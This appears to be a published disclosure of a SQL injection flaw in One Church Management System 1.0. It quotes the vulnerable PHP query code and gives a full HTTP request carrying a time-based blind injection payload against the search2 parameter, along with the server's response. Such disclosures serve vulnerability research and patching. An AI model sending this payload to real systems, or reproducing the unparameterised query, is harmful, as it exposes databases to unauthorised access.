# Exploit Title: One Church Management System 1.0 - attendancy.php (search2) SQL Injection # Date: 18/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html # Version: 1.0 # Tested on: Linux Title: ================ One Church Management System 1.0 - attendancy.php (search2) SQL Injection Summary: ================ The One Church Management System suffers from a Structured Query Language (SQL) injection vulnerability because of the lack of query preparation with the PDO module. This allows an attacker to query the database, breaking confidentiality and integrity. 88. if(isset($_POST['search2'])&& !empty($_POST['search2'])){ 89. $search2 = $_POST['search2']; 90. $sql="SELECT tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone from tblchristian where Code = '$search2'"; 91. $query = $dbh -> prepare($sql); 92. $query->execute(); 93. $results=$query->fetchAll(PDO::FETCH_OBJ); 94. $cnt=1; Severity Level: ================ 9.1 (Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Affected Product: ================ One Church Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /one_church/attendancy.php HTTP/1.1 Host: target.com Content-Length: 102 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/attendancy.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search= In the search2 parameter I injected a SQL blind payload: ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc Reponse: HTTP/1.1 302 Found Date: Fri, 18 Mar 2022 14:02:51 GMT Server: Apache/2.4.52 Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://target.com/one_church/index.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14927